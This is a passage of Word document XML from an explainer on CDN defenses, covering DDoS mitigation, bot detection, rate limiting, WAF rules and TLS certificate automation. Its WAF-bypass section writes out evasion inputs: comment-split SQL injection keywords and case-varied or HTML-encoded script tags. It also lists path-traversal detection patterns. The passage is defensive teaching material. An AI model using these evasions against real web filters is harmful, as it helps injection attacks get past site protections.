    <w:p w14:paraId="01A02D98" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>BGP Flowspec (RFC 5575) allows the CDN to push packet-filtering rules to upstream routers via BGP, dropping attack traffic at the routing layer before it even reaches CDN servers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7901CAB3" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54CA34DB" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">Flowspec rule: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5A964A" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  match: src 192.0.2.0/24, protocol UDP, dst-port 443</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4481D4" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  action: discard</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6135800D" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>This rule is propagated via BGP to all upstream routers — attack packets are dropped at the network edge, not at the CDN server. This offloads mitigation from server CPU to dedicated network hardware, handling Tbps attacks without overwhelming CDN servers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7E4AFD" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Layer 7 application attack mitigation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="740FA4B3" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Volumetric attacks are relatively simple — they're just too much traffic. Layer 7 attacks are more sophisticated — they mimic legitimate browser behavior to bypass volumetric defenses:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172E4A3C" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1220"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HTTP flood:</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> Millions of requests for legitimate URLs, each valid individually but overwhelming in aggregate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E2A627" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1220"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Slowloris:</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> Opens many connections, sends partial HTTP requests very slowly, exhausting server connection limits without sending much traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="430D1583" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1220"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Cache poisoning attacks:</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> Crafted requests attempt to poison the CDN cache with incorrect responses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67FF1948" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bot detection and CAPTCHA challenges:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4079BF11" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>CDNs identify non-browser traffic via:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A3B5D6" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1221"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>JavaScript challenge:</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> The CDN serves a JavaScript snippet before the actual content. Real browsers execute it (solving a computational puzzle, checking browser fingerprint consistency). Bots that don't execute JavaScript fail the challenge. The "checking your browser" page on Cloudflare is this mechanism.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3883913C" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1221"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Browser fingerprinting:</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> Check consistency of browser signals — User-Agent, Accept-Language, HTTP/2 vs HTTP/1.1, TLS ciphersuites, behavior timing. Bots often send inconsistent signals (claiming to be Chrome but not sending Chrome's TLS fingerprint).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A677102" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1221"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Behavioral analysis:</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> Real users exhibit browsing patterns (pauses, mouse movements, scroll behavior). Bots access pages at machine speed with mechanical patterns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6714C5" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1221"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>IP reputation:</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> Known bot networks, Tor exit nodes, VPNs, datacenter IP ranges are flagged for additional scrutiny.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5694A880" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Rate limiting at the edge:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="201115A9" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>CDNs implement rate limiting without touching origin infrastructure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A78C218" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15BAFA6C" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Rule: /api/login → max 10 requests per IP per minute</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4125C3B2" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Rule: /search → max 100 requests per IP per minute</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D161EC" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Rule: /*.php → block entirely (no PHP on this static site)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA687E7" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Rate limit counters are maintained in the CDN edge's in-memory store. At high traffic, maintaining precise distributed counters (shared across all threads on a server) requires lock-free data structures (atomic increment, approximate counting with eventual consistency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB89BB6" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Web Application Firewall (WAF) at the Edge</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B3A5316" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CDN WAF position:</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> Deployed at the CDN edge, WAF rules execute before any request reaches origin — malicious requests are blocked with zero origin exposure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77922EC8" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Rule categories:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E19ACE9" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>OWASP Core Rule Set (CRS):</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> OWASP CRS is a standardized set of WAF rules covering:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A0B4307" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1222"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>SQL injection: detecting SQL keywords, operators, and syntax in request parameters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D176253" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1222"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>XSS: detecting script injection patterns, JavaScript event handlers, data URIs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2523CA85" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1222"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Path traversal: detecting ../, %2e%2e%2f sequences.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691D04EA" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1222"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Remote file inclusion: detecting attempts to include remote URLs as file paths.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1952727B" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1222"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Command injection: detecting shell metacharacters and command syntax.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AFE9AA0" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>The CRS assigns </w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>anomaly scores</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> to matched patterns. A single SQL keyword in a URL gets a low score. Multiple SQL patterns across URL, body, and headers get a high score. Requests exceeding a configurable score threshold are blocked.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="647E999B" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Managed rules vs custom rules:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D7B2F6" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1223"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Managed rules</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> (maintained by the CDN provider): OWASP CRS, platform-specific rules (WordPress, Drupal, Magento vulnerabilities), CVE-specific virtual patches.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F97789" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1223"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Custom rules</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> (maintained by the customer): Business-specific logic (block requests from specific countries, require API key for certain endpoints, rate limit specific user agents).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="756B9962" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The WAF bypass cat-and-mouse:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE843E8" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>WAF rules based on pattern matching are inherently bypassable by encoding attacks differently:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5881E622" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1224"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>SQL injection: UNION SELECT → UN/**/ION SEL/**/ECT (SQL comments strip the detection pattern).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A6691CD" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1224"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>XSS: &lt;script&gt; → &lt;sCrIpT&gt; (case variation), &amp;#x3C;script&amp;#x3E; (HTML encoding).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF42B15" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>CDN WAFs mitigate this via:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="012594A8" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1225"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Normalization:</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> Decode URL encoding, HTML encoding, unicode escapes, and SQL comments before applying rules. Apply rules to the canonical decoded form.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C4A436" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1225"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Multiple encoding passes:</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> Some attacks use double or triple encoding. Normalize recursively until the string is stable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DC616B" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1225"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Machine learning anomaly detection:</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> Rather than matching specific patterns, flag requests that deviate significantly from baseline request patterns for that endpoint. Novel attacks may bypass signature rules but exhibit anomalous statistical properties.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C9214E2" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HTTPS Enforcement and Certificate Management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B37FD7B" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HTTPS redirect:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E040B89" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>CDNs enforce HTTPS by redirecting all HTTP requests:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3B54EC" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B35A684" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>HTTP request to example.com:80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34420C6A" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>CDN edge responds:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E31F03" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  HTTP/1.1 301 Moved Permanently</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7829B47E" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  Location: https://example.com/...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72FE3005" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C851F89" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>The 301 is served by the CDN edge without origin involvement. The HSTS header tells browsers to always use HTTPS for future requests — eliminating the HTTP→HTTPS redirect latency for returning visitors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A179E04" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Automated certificate provisioning:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3715D1BA" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>CDNs manage TLS certificates using ACME (Automatic Certificate Management Environment) protocol with Let's Encrypt or their own CA:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1B90FB" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1226"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Customer adds domain to CDN → CDN initiates ACME challenge.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B95C0CE" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1226"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>CDN controls DNS for the domain (via delegation) or controls HTTP for the domain (already serving traffic) → passes DNS-01 or HTTP-01 challenge trivially.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B126D96" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1226"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Certificate issued, deployed to all PoPs within seconds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D02E9AA" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1226"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Certificate automatically renewed 30 days before expiry.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13CACDE4" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Custom certificates (EV certificates, certificates from specific CAs) can be uploaded via API. The CDN stores private keys in HSMs (Hardware Security Modules) — tamper-resistant hardware that performs cryptographic operations without exposing the private key in software.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="664960F8" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:pict w14:anchorId="08AA0F0F">
          <v:rect id="_x0000_i4555" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2819EC54" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>6. CDN Reliability — High Availability Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058C0B04" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Redundancy at Every Layer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688F4A47" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Multiple PoPs per region:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C217DFA" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>A CDN doesn't operate a single PoP per city. Major metropolitan areas have multiple PoPs at different facilities (different internet exchanges, different power grids, different network providers). If one PoP's facility experiences a power failure, other PoPs in the region continue serving traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BEAC726" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Multiple servers per PoP:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E6C2CA" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
